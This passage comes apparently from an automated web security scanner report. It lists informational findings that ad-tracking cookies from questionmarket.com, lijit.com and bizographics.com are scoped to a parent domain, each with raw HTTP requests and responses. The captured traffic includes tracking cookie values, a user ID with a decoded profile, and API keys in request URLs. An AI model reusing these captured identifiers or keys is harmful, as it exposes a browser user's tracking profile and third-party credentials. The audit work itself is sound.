ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_921394-[^j@M-0_922005-e^j@M-/G; expires=Wed, 12-Sep-2012 05:43:48 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d922005/24/42825515/decide.php?ord=1311428633 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/science_technology/L37/5623109/x29/DCI/6748_HewlettPackard_D_819486368/07212011_HP_6748_DCI_CT_Tech_160x600_17_17205321.html/7263485738303471796b67414345734b?;ord=5623109?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ST=908257_; CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42853597-2-1; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-0_921394-[^j@M-0

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:43:48 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: CS1=deleted; expires=Fri, 23 Jul 2010 13:43:47 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42853597-2-1_42825515-24-2; expires=Wed, 12 Sep 2012 05:43:48 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_921394-[^j@M-0_922005-e^j@M-/G; expires=Wed, 12-Sep-2012 05:43:48 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.30. http://amch.questionmarket.com/adsc/d922005/24/42825637/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d922005/24/42825637/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Fri, 23 Jul 2010 13:19:26 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-2; expires=Wed, 12 Sep 2012 05:19:27 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-2; expires=Wed, 12-Sep-2012 05:19:27 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d922005/24/42825637/decide.php?ord=1311427172 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php/L18/182607716/x29/DCI/6748_HewlettPackard_D_819486337/07212011_1stImpRdBlk_160x600_11_17205264.html/7263485738303471796b67414345734b?;ord=182607716?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ST=908257_; CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:19:27 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Set-Cookie: CS1=deleted; expires=Fri, 23 Jul 2010 13:19:26 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-2; expires=Wed, 12 Sep 2012 05:19:27 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-2; expires=Wed, 12-Sep-2012 05:19:27 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.31. http://ap.lijit.com/www/delivery/retarget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ap.lijit.com
Path:	/www/delivery/retarget.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ljt_retarget=2592000%2Cdeleted; expires=Mon, 22-Aug-2011 04:52:06 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/retarget.php?a=r&r=radiumone HTTP/1.1
Host: ap.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=1311396557609b4824cb807cd&rand=1311396557610&uri=http://www.lijit.com/users/curse&informer=7713456&type=fpads&loc=http%3A%2F%2Fwww.curse.com%2F&rr=http%3A//c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html&ifr=1&v=1.0&csync=1
Cookie: ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; ljtrtb=eJyrVjJUslIyMTQxMzUxMTI0MDSwMDYzNDI1U6oFAE8JBbs%3D; tpro_inst=b25aa85a3e9390bd4920c9da2e048768; tpro=eJxNUNGOgyAQ%2FJd9Jg2IWvUL7h%2BaC6GISqJgQC9pjP9%2BuzTe9W1nYGZn9oA1hsHNFroDRut7G2laNDH8Ju8MBnuhWp4M9Jj%2FSiUK4rhgIBDcM6gQNEqWWdswkJUq2wxKBhVX67wngkWBTlGbbGX0bohsUaCHqPRyGevktEfAYHJpvdiwTZSSo4WZ3NxH68nGh5wRTV42L5G0xHkTlryGK8mJFpSLqzqDAnPVXAnO3wrMzz9i1rQjzLN9l%2FbB50OUzQeNEGuPUfcqmSmHrE%2FUJbdRjseRJ%2BjgKzyfL8BWG3RCCiHbuqrE%2Bf3XCO%2B%2BOQr7%2F8pgCb0yYfckYvBjY3IB%2B4K4cTjPX8H9e9I%3D; ljt_csync=dotomi%2Crtb_turn%2Crtb_simplifi%2C1

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 04:52:06 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n29 ( iad-agg-n5), ms iad-agg-n5 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Content-Length: 49
Content-Type: image/gif
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: ljt_retarget=2592000%2Cdeleted; expires=Mon, 22-Aug-2011 04:52:06 GMT; path=/; domain=.lijit.com

GIF89a...................!.......,...........T..;

10.32. http://api.bizographics.com/v1/profile.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1mhipNwAuhnalExkNK7HUtFp4B4dlWpgdjcNJS3THUemj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=tpCKokqYoGQhUXUii5DtcSNQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2GokttNiptM6FExkNK7HUtFp4B4dlWpgdhSIRMejJJHYD8l3ZY0x538oYYx7zFKAiiaQIFsisgNSNyapcheyl9qqj5isLeKJDB2UPGjg3vXDjpIpvQ2ul4q8MQQAdGRQisgNGpunspyGhHwpKMTlyYtq6Za6UAkBPsFfYeuxE6rBNXvlsMJ7hbaahMwGHWJy7cP8bcdojm5is3wEUThITfFDIipF2rkN6WsamcD5VW1iiLhR1ipFUs24V52t2cN1qss1vBdTs9TcInbC13AzyJVMisQS3uIkipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisHP1G6sC1FckSLE2C8oCp9uCwcaIYpAt5zvJh0QDyipWUVtAQ9nxHLCs8DdoSbabpX; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sat, 23 Jul 2011 04:31:00 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1mhipNwAuhnalExkNK7HUtFp4B4dlWpgdjcNJS3THUemj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 511
Connection: keep-alive

dj.module.ad.bio.loadBizoData({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_syst
...[SNIP]...

10.33. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2QdMDSbkhgllExkNK7HUtFp4B4dlWpgdh9dravNQislaD8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=53%26sei=21%26sci=1%26sai=0%26smi=0%26pbi=0%26sts=1311428797730419%26sui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
